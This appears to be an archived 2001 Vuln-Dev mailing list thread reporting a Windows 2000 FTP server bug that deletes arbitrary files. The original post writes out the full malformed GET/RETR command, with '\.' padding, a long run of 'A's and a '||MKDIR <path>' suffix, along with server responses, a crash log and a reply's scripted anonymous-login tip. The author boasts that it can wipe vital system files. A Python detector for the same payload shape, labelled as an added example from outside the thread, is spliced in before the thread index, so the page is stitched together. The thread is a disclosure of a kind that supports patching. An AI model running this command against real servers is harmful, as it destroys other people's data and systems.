Vulnerability Development mailing list archives
Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system.
From: Stephen <spjohn () MAIL UTEXAS EDU>
Date: Fri, 16 Feb 2001 00:52:25 -0800
Tried this on Win2k Server Build 2195. I was able to overwrite a file when logged on as anonymous, and the file permissions on the file were set to no access by anyone. But it should be noted that I logged in from the local system, although I doubt a remote login would change anything.

Anyone trying to get this to work using Windows might want to try running 'ftp -A -s:comfile X.X.X.X'; this logs in as anonymous and runs the commands in the file 'comfile', where comfile has the get command in it (with no newlines).

Stephen John

----- Original Message -----
From: Antti Hakulinen
To: VULN-DEV () SECURITYFOCUS COM
Sent: Thursday, February 15, 2001 2:53 PM
Subject: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system.

This little "ms feature" allows any file on your system to be deleted. This applies at least to Win2k build 2195, service pack 1 & latest updates. Using the GET command like this:

_________________________________________________________________________________________________________
C:\FTP <target machine>
blaah blaah....
(BTW: This "feature" works fine as anonymous user)
_________________________________________________________________________________________________________
ftp> get \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. 
\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR c: \downloads\mp3\1.mp3 ---> PORT 212,246,182,42,5,52 200 PORT command successful. ---> RETR \.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\. 
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA||MKDIR 500 Command was too long 
____________________________________________________________________________________________________________

So, any file you named in the ||MKDIR part is deleted. Well, at least it is gone ;)

Malicious users can now delete files, assuming they know where the file is located. It will be hell easy to put an end to any machine/server that is using MS FTP, just by deleting all the vital system files.

If the file doesn't exist, one will be created, but the length is always 0. (So no luck with writing a file yet, heh.)

OHH! Don't get fooled when you do this, umm... for example to your config.sys file. There will be an error message: PERMISSION DENIED. But who cares, this fabulous MS feature deletes it anyway. -huh-

Here is the DRWTSN32.LOG file from my system.
-NOTE- The "get" command line was a little different in letters when I tested this "feature" :), but it was equal in length.

Application exception occurred:
App: ftp.exe (pid=824)
When: 2/16/2001 @ 00:04:23.868
Exception number: c0000005 (access violation)

*----> System Information <----*
Computer Name: DIVINE
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 3 Stepping 0
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: xxxxxxxxxxxxxxxx
Registered Owner: xxxxxxxxxxxxxxxx
___________________________________________________________________________________________________________

Workarounds: Too tired to search for one right now. Noticed that RETR??? What's that anyway, so maybe disabling commands. Otherwise, better not to be using w2k as an FTP server.

P.S: If you can reproduce this, please let me know... if you can't, let me know also. :) I'll end my days if this was a known bug and I haven't just updated my system (which was 2-3 days ago) :) Anyway, if this is a known bug, let me know please.

Regards:
Antti Hakulinen
_____________________________________________________________________________________________________________
Antti Hakulinen
Antti.Hakulinen () fi flextronics com
IT Assistant
Flextronics Design Finland
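As an added defender-side example (not code from the original post, nor Microsoft's), the check below flags control-channel commands shaped like the RETR echoed above (overlong, padded with repeated `\.`, carrying `||` and an absolute drive path) and pairs each with the server reply that followed; the session it runs over is constructed, and the 256-byte threshold and function names are assumptions.

```python
import re

# Constructed sample of FTP control-channel traffic (not taken from the post):
# ("C", ...) is a client command, ("S", ...) the server reply that followed it.
SAMPLE_SESSION = [
    ("C", "USER anonymous"),
    ("C", "PASS guest@example.invalid"),
    ("C", "PORT 10,0,0,5,5,52"),
    ("S", "200 PORT command successful."),
    # Same shape as the RETR above: 516 '\.' hops, ~1 KB padding, '||MKDIR', drive path.
    ("C", "RETR " + "\\." * 516 + "A" * 1031 + "||MKDIR c:\\downloads\\mp3\\1.mp3"),
    ("S", "500 Command was too long"),
    ("C", "RETR readme.txt"),
    ("S", "150 Opening ASCII mode data connection for readme.txt."),
]

MAX_COMMAND_LEN = 256  # assumption: no legitimate client sends longer lines here

def inspect_command(line):
    """Return the reasons a client command looks hostile; [] means it looks clean."""
    reasons = []
    verb, _, arg = line.partition(" ")
    if len(line) > MAX_COMMAND_LEN:
        reasons.append("overlong command (%d bytes)" % len(line))
    if re.search(r"(\\\.){8,}", arg):            # long runs of '\.' path padding
        reasons.append("repeated '\\.' padding in path")
    if "||" in arg:                               # '||' smuggled into a filename
        reasons.append("'||' separator inside filename argument")
    if re.search(r"(^|[\s|])[A-Za-z]:\\", arg):   # C:\... outside the FTP root
        reasons.append("%s names an absolute drive path" % verb.upper())
    return reasons

def scan_session(session):
    """Pair every flagged client command with the server reply that followed it."""
    findings = []
    for i, (who, text) in enumerate(session):
        if who != "C":
            continue
        reasons = inspect_command(text)
        if not reasons:
            continue
        reply = next((t for w, t in session[i + 1:] if w == "S"), None)
        findings.append({"command": text[:32] + "...", "reasons": reasons, "reply": reply})
    return findings

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f["command"], f["reasons"], "->", f["reply"])
```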
Current thread:
- WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Antti Hakulinen (Feb 15)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Stephen (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to bedeleted from the remote system. Kevin van der Raad (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. 3APA3A (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Antti Hakulinen (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted Robert A. Seace (Feb 16)
- Re: WIN2K security bug with FTP. Bug allows any file to be deleted from the remote system. Stephen (Feb 16)